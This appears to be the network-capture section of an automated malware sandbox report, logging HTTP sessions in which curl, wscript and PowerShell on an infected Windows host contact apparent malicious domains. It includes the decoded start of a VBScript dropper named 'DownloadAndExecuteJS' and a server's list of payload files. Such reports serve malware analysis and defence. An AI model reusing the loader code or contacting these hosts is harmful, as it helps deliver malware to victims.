                                                                                                                              0192.168.2.649732193.149.129.61802144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 17, 2024 16:32:14.101443052 CET175OUTGET /1.php?s=mints21 HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                              Host: gsosnub8zg3.top
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 17, 2024 16:32:15.718879938 CET166INHTTP/1.1 302 Found
                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                              Date: Tue, 17 Dec 2024 15:32:15 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: keep-alive
                                                                                                                              Location: http://www.google.com


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.649733193.149.129.61807016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 17, 2024 16:32:14.102019072 CET175OUTGET /1.php?s=mints21 HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                              Host: gsosnub8zg3.top
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 17, 2024 16:32:15.720865011 CET166INHTTP/1.1 302 Found
                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                              Date: Tue, 17 Dec 2024 15:32:15 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: keep-alive
                                                                                                                              Location: http://www.google.com


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.649741172.217.19.228807016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 17, 2024 16:32:15.980617046 CET159OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                              Host: www.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 17, 2024 16:32:18.069437981 CET1236INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 17 Dec 2024 15:32:17 GMT
                                                                                                                              Expires: -1
                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-yzXRdpy2Rs1IVD7ZvaxFVw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                              Server: gws
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              Set-Cookie: AEC=AZ6Zc-UtPgyEPT9fdVxuwknB-RcPKkfgyhFbCKy0OE2Os75rf3lnqSkpgYA; expires=Sun, 15-Jun-2025 15:32:17 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                              Set-Cookie: NID=520=bEVFesC79TSQlR3ja3UcO--pzty1bla6okvd6E6RBfc-3JHkEhAx8lFHMGuDFMVniAS0jy2tYW9AFda8iTwl7Nutom7mj2ndklqsBi6VUwBQNyh2x2r6nsX9SP-QUxAn1k-PgztxL_5-antSsACod0yxCB3HvpWL9IwnBGrZ7KhcctiXzuzNGWOuMwFvc-naafbSzJmegw; expires=Wed, 18-Jun-2025 15:32:17 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                              Accept-Ranges: none
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Data Raw: 34 37 61 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73
                                                                                                                              Data Ascii: 47a0<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images
                                                                                                                              Dec 17, 2024 16:32:18.069524050 CET224INData Raw: 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20
                                                                                                                              Data Ascii: , videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Typ
                                                                                                                              Dec 17, 2024 16:32:18.069536924 CET1236INData Raw: 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 6c 6f 67 6f 73 2f 64 6f 6f 64 6c 65 73 2f 32 30 32 34 2f 73 65 61 73 6f 6e 61 6c 2d 68 6f 6c 69 64 61 79 73 2d 32 30 32 34 2d 36 37 35 33 36 35 31 38 33 37 31 31 30 33 33 33 2d 6c 61 77 2e
                                                                                                                              Data Ascii: e"><meta content="/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-law.gif" itemprop="image"><meta content="Seasonal Holidays 2024" property="twitter:title"><meta content="Happy Holidays! #GoogleDoodle" property="twitter:description
                                                                                                                              Dec 17, 2024 16:32:18.069722891 CET1236INData Raw: 37 2c 38 39 2c 31 2c 31 2c 31 2c 31 2c 31 35 2c 36 33 2c 34 2c 32 2c 31 36 2c 32 36 2c 35 2c 32 33 39 33 34 32 38 37 2c 34 30 34 33 37 31 30 2c 32 35 32 32 34 30 34 35 2c 34 36 33 36 2c 31 31 37 33 31 2c 34 37 30 35 2c 32 39 39 34 37 2c 35 34 30
                                                                                                                              Data Ascii: 7,89,1,1,1,1,15,63,4,2,16,26,5,23934287,4043710,25224045,4636,11731,4705,29947,54098,22623,884,14280,8181,5934,22913,20583,9236,9775,2664,3430,3319,23879,9139,4599,328,4456,1769,6754,16653,6,10210,688,7851,24,21978,1135,212,13702,8211,3286,279
                                                                                                                              Dec 17, 2024 16:32:18.069737911 CET304INData Raw: 39 2c 32 30 33 38 30 38 38 27 2c 6b 42 4c 3a 27 62 42 4a 58 27 2c 6b 4f 50 49 3a 38 39 39 37 38 34 34 39 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3b 28 28 61 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 29 3d 3d 6e 75 6c 6c 3f 30 3a
                                                                                                                              Data Ascii: 9,2038088',kBL:'bBJX',kOPI:89978449};(function(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){var g=this||self;function k(){retu
                                                                                                                              Dec 17, 2024 16:32:18.069868088 CET1236INData Raw: 6f 6e 20 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3b 61 26 26 28 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c 7c 21 28 62 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 65 69 64 22 29 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65
                                                                                                                              Data Ascii: on n(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||l}function p(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}function q(a){/^http:/i.test(a)&&window.loca
                                                                                                                              Dec 17, 2024 16:32:18.069905996 CET1236INData Raw: 6f 67 6c 65 29 2e 70 6c 6d 7c 7c 28 66 2e 70 6c 6d 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 6c 6d 2e 70 75 73 68 2e 61 70 70 6c 79 28 67 6f 6f 67 6c 65 2e 6c 6d 2c 61 29 7d 29 3b 67 6f 6f 67 6c 65 2e 6c 71 3d 5b 5d 3b 76 61 72
                                                                                                                              Data Ascii: ogle).plm||(f.plm=function(a){google.lm.push.apply(google.lm,a)});google.lq=[];var g;(g=google).load||(g.load=function(a,b,c){google.lq.push([[a],b,c])});var h;(h=google).loadAll||(h.loadAll=function(a,b){google.lq.push([a,b])});google.bx=!1;v
                                                                                                                              Dec 17, 2024 16:32:18.070044994 CET352INData Raw: 72 3a 23 32 64 32 64 32 64 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 33 38 70
                                                                                                                              Data Ascii: r:#2d2d2d;background-image:none;_background-image:none;background-position:0 -138px;background-repeat:repeat-x;border-bottom:1px solid #000;font-size:24px;height:29px;_height:30px;opacity:1;filter:alpha(opacity=100);position:absolute;top:0;wid
                                                                                                                              Dec 17, 2024 16:32:18.070209026 CET1236INData Raw: 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 74 63 62 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 67 62 7a 20 2e 67 62 74 63 62 7b 72 69 67 68 74 3a 30 7d 23 67 62 67 20 2e 67
                                                                                                                              Data Ascii: ;width:100%}.gbtcb{position:absolute;visibility:hidden}#gbz .gbtcb{right:0}#gbg .gbtcb{left:0}.gbxx{display:none !important}.gbxo{opacity:0 !important;filter:alpha(opacity=0) !important}.gbm{position:absolute;z-index:999;top:-999px;visibility:
                                                                                                                              Dec 17, 2024 16:32:18.070373058 CET1236INData Raw: 67 62 69 34 73 2c 23 67 62 69 34 74 7b 7a 6f 6f 6d 3a 31 7d 2e 67 62 74 63 2c 2e 67 62 6d 63 2c 2e 67 62 6d 63 63 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64
                                                                                                                              Data Ascii: gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,.gbmcc{display:block;list-style:none;margin:0;padding:0}.gbmc{background:#fff;padding:10px 0;position:relative;z-index:2;zoom:1}.gbt{position:relative;display:-moz-inline-box;display:inline-block;line-height:27p
                                                                                                                              Dec 17, 2024 16:32:18.190164089 CET1236INData Raw: 78 20 2d 32 32 70 78 3b 62 6f 72 64 65 72 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 70 61 64 64 69 6e 67 3a 32 39 70 78 20 30 20 30 3b 2a 70 61 64 64 69 6e 67 3a 32 37 70 78 20 30 20 30 3b 77 69 64 74 68 3a 31 70 78 7d 2e 67 62 7a 74 3a 68 6f
                                                                                                                              Data Ascii: x -22px;border:0;font-size:0;padding:29px 0 0;*padding:27px 0 0;width:1px}.gbzt:hover,.gbzt:focus,.gbgt-hvr,.gbgt:focus{background-color:#4c4c4c;background-image:none;_background-image:none;background-position:0 -102px;background-repeat:repeat


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.649740172.217.19.228802144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 17, 2024 16:32:15.980797052 CET159OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                              Host: www.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 17, 2024 16:32:17.988176107 CET1236INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 17 Dec 2024 15:32:17 GMT
                                                                                                                              Expires: -1
                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-dhtq2YMRepnKwY9EJrtT9w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                              Server: gws
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              Set-Cookie: AEC=AZ6Zc-UbNKDhNg_2IufCmfO_m8zgQmLJpvLQihGVItJli9yJEUITz3rnuA; expires=Sun, 15-Jun-2025 15:32:17 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                              Set-Cookie: NID=520=BBqVO3F8hisol2e9fWTqQ9NJseANnfo7SumbpOfOOf6r_hr04BXoyAg8p6msd7CVCGExl3icGz0rbswHFmHgCthisrM3SwnXfOsa6QS9MQvnQtzHX_TXH7-UKhLw_awIUP3QBF9mz5Jp26B31hTn4d4Tshczyw1UJ2UIKURwIPTDDyqB5w2Nok0Js213j_N9LIvzIgvuvg; expires=Wed, 18-Jun-2025 15:32:17 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                              Accept-Ranges: none
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Data Raw: 33 31 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c
                                                                                                                              Data Ascii: 319d<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images,
                                                                                                                              Dec 17, 2024 16:32:17.988254070 CET1236INData Raw: 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79
                                                                                                                              Data Ascii: videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/l
                                                                                                                              Dec 17, 2024 16:32:17.988269091 CET1236INData Raw: 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 67 3d 7b 6b 45 49 3a 27 67 5a 6c 68 5a 5f 7a 73 47 38 71 6b 32 72 6f 50 6a 4b 4b 34 71 51 73 27 2c 6b 45 58 50 49 3a 27 30 2c 31 38 31 36 38 2c 33 36 38 32 31 34 38 2c 31 30 36 38 2c 35 33 38
                                                                                                                              Data Ascii: >(function(){var _g={kEI:'gZlhZ_zsG8qk2roPjKK4qQs',kEXPI:'0,18168,3682148,1068,538661,2872,2891,43028,30022,16105,78218,256417,10161,45786,9779,44501,54903,3801,2412,50869,7734,19358,8177,11813,1635,29276,15671,11412,5213674,582,239,5992032,28
                                                                                                                              Dec 17, 2024 16:32:17.988476038 CET528INData Raw: 2c 31 33 35 2c 35 34 32 2c 37 38 32 2c 31 30 36 2c 32 33 2c 35 32 34 2c 31 2c 31 36 31 2c 32 32 2c 31 31 30 2c 32 39 30 2c 38 2c 32 30 39 2c 33 2c 31 35 2c 34 35 32 2c 34 30 2c 38 32 35 2c 33 35 2c 33 2c 31 32 2c 34 32 34 2c 36 39 2c 33 2c 35 30
                                                                                                                              Data Ascii: ,135,542,782,106,23,524,1,161,22,110,290,8,209,3,15,452,40,825,35,3,12,424,69,3,504,151,361,282,400,1,131,389,120,305,96,301,185,194,61,33,109,465,2,7,1,128,719,63,14,362,493,340,139,32,581,201,634,1323,28,1371,661,21352282,37198,18,2004,1478,
                                                                                                                              Dec 17, 2024 16:32:17.988523006 CET1236INData Raw: 6e 20 6b 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 6b 4f 50 49 7c 7c 6e 75 6c 6c 7d 3b 76 61 72 20 6c 2c 6d 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 66 6f 72
                                                                                                                              Data Ascii: n k(){return window.google&&window.google.kOPI||null};var l,m=[];function n(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||l}function p(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid"))
                                                                                                                              Dec 17, 2024 16:32:17.988538980 CET224INData Raw: 67 6c 65 29 2e 73 78 7c 7c 28 65 2e 73 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 73 79 2e 70 75 73 68 28 61 29 7d 29 3b 67 6f 6f 67 6c 65 2e 6c 6d 3d 5b 5d 3b 76 61 72 20 66 3b 28 66 3d 67 6f 6f 67 6c 65 29 2e 70 6c 6d 7c 7c
                                                                                                                              Data Ascii: gle).sx||(e.sx=function(a){google.sy.push(a)});google.lm=[];var f;(f=google).plm||(f.plm=function(a){google.lm.push.apply(google.lm,a)});google.lq=[];var g;(g=google).load||(g.load=function(a,b,c){google.lq.push([[a],b,c])})
                                                                                                                              Dec 17, 2024 16:32:17.988552094 CET1236INData Raw: 3b 76 61 72 20 68 3b 28 68 3d 67 6f 6f 67 6c 65 29 2e 6c 6f 61 64 41 6c 6c 7c 7c 28 68 2e 6c 6f 61 64 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 61 2c 62 5d 29 7d 29 3b 67 6f 6f 67 6c 65
                                                                                                                              Data Ascii: ;var h;(h=google).loadAll||(h.loadAll=function(a,b){google.lq.push([a,b])});google.bx=!1;var k;(k=google).lx||(k.lx=function(){});var l=[],m;(m=google).fce||(m.fce=function(a,b,c,n){l.push([a,b,c,n])});google.qce=l;}).call(this);google.f={};(f
                                                                                                                              Dec 17, 2024 16:32:17.988567114 CET1236INData Raw: 78 3b 68 65 69 67 68 74 3a 32 39 70 78 3b 5f 68 65 69 67 68 74 3a 33 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 31 30 30 29 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74
                                                                                                                              Data Ascii: x;height:29px;_height:30px;opacity:1;filter:alpha(opacity=100);position:absolute;top:0;width:100%;z-index:990}#gbx3{left:0}#gbx4{right:0}#gbb{position:relative}#gbbw{left:0;position:absolute;top:30px;width:100%}.gbtcb{position:absolute;visibil
                                                                                                                              Dec 17, 2024 16:32:17.989044905 CET1236INData Raw: 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 63 30 63 30 63 30 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e
                                                                                                                              Data Ascii: r-color:transparent;border-top-color:#c0c0c0;display:-moz-inline-box;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,.gbmcc{displ
                                                                                                                              Dec 17, 2024 16:32:17.989062071 CET1236INData Raw: 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f
                                                                                                                              Data Ascii: gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0
                                                                                                                              Dec 17, 2024 16:32:18.107996941 CET1236INData Raw: 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23
                                                                                                                              Data Ascii: id,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.64970945.11.180.774432852C:\Windows\System32\curl.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-17 15:32:02 UTC122OUTGET /67618a47ee67a/67618a47ee8cd.vbs HTTP/1.1
                                                                                                                              Host: pko-download.kagyouth.co.ke
                                                                                                                              User-Agent: curl/7.83.1
                                                                                                                              Accept: */*
                                                                                                                              2024-12-17 15:32:02 UTC224INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 17 Dec 2024 15:32:02 GMT
                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                              Last-Modified: Tue, 17 Dec 2024 14:27:19 GMT
                                                                                                                              ETag: "788-629781840c468"
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 1928
                                                                                                                              Connection: close
                                                                                                                              2024-12-17 15:32:02 UTC1928INData Raw: 4f 70 74 69 6f 6e 20 45 78 70 6c 69 63 69 74 0a 0a 53 75 62 20 44 6f 77 6e 6c 6f 61 64 41 6e 64 45 78 65 63 75 74 65 4a 53 28 62 61 73 65 55 72 6c 2c 20 6c 69 73 74 45 6e 64 70 6f 69 6e 74 2c 20 6a 73 46 6f 6c 64 65 72 29 0a 20 20 20 20 44 69 6d 20 78 6d 6c 68 74 74 70 2c 20 66 73 6f 2c 20 73 68 65 6c 6c 2c 20 6a 73 46 69 6c 65 73 2c 20 73 65 6c 65 63 74 65 64 46 69 6c 65 2c 20 74 65 6d 70 46 6f 6c 64 65 72 2c 20 6a 73 46 69 6c 65 50 61 74 68 0a 20 20 20 20 53 65 74 20 78 6d 6c 68 74 74 70 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 22 29 0a 20 20 20 20 53 65 74 20 66 73 6f 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 22 29
                                                                                                                              Data Ascii: Option ExplicitSub DownloadAndExecuteJS(baseUrl, listEndpoint, jsFolder) Dim xmlhttp, fso, shell, jsFiles, selectedFile, tempFolder, jsFilePath Set xmlhttp = CreateObject("MSXML2.XMLHTTP") Set fso = CreateObject("Scripting.FileSystemObject")


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.64971245.11.180.774437088C:\Windows\System32\wscript.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-17 15:32:06 UTC345OUTGET /list_files.php HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-ch
                                                                                                                              UA-CPU: AMD64
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Host: pko-download.kagyouth.co.ke
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-17 15:32:06 UTC192INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 17 Dec 2024 15:32:06 GMT
                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Length: 5511
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/plain;charset=UTF-8
                                                                                                                              2024-12-17 15:32:06 UTC5511INData Raw: 61 63 6f 73 76 62 2e 74 78 74 0a 61 63 76 69 78 72 2e 74 78 74 0a 61 64 69 6d 71 68 2e 74 78 74 0a 61 64 76 6b 77 65 2e 74 78 74 0a 61 65 68 6f 69 73 2e 74 78 74 0a 61 67 6e 70 72 6c 2e 74 78 74 0a 61 68 74 6b 63 6f 2e 74 78 74 0a 61 6a 6d 64 78 68 2e 74 78 74 0a 61 6a 79 6b 75 76 2e 74 78 74 0a 61 6c 7a 63 71 64 2e 74 78 74 0a 61 6f 6c 77 7a 68 2e 74 78 74 0a 61 6f 77 71 6b 73 2e 74 78 74 0a 61 70 69 6e 68 77 2e 74 78 74 0a 61 70 79 62 76 64 2e 74 78 74 0a 61 75 63 6a 70 69 2e 74 78 74 0a 61 76 69 6c 6f 68 2e 74 78 74 0a 61 76 6a 62 6d 74 2e 74 78 74 0a 61 77 72 67 65 62 2e 74 78 74 0a 61 78 67 6b 76 66 2e 74 78 74 0a 61 78 74 66 77 6b 2e 74 78 74 0a 61 78 79 6f 68 66 2e 74 78 74 0a 61 79 6f 6a 74 72 2e 74 78 74 0a 62 63 6b 69 6d 66 2e 74 78 74 0a 62 65
                                                                                                                              Data Ascii: acosvb.txtacvixr.txtadimqh.txtadvkwe.txtaehois.txtagnprl.txtahtkco.txtajmdxh.txtajykuv.txtalzcqd.txtaolwzh.txtaowqks.txtapinhw.txtapybvd.txtaucjpi.txtaviloh.txtavjbmt.txtawrgeb.txtaxgkvf.txtaxtfwk.txtaxyohf.txtayojtr.txtbckimf.txtbe


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.64971145.11.180.774435708C:\Windows\System32\wscript.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-17 15:32:06 UTC345OUTGET /list_files.php HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-ch
                                                                                                                              UA-CPU: AMD64
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Host: pko-download.kagyouth.co.ke
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-17 15:32:07 UTC192INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 17 Dec 2024 15:32:07 GMT
                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Length: 5511
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/plain;charset=UTF-8
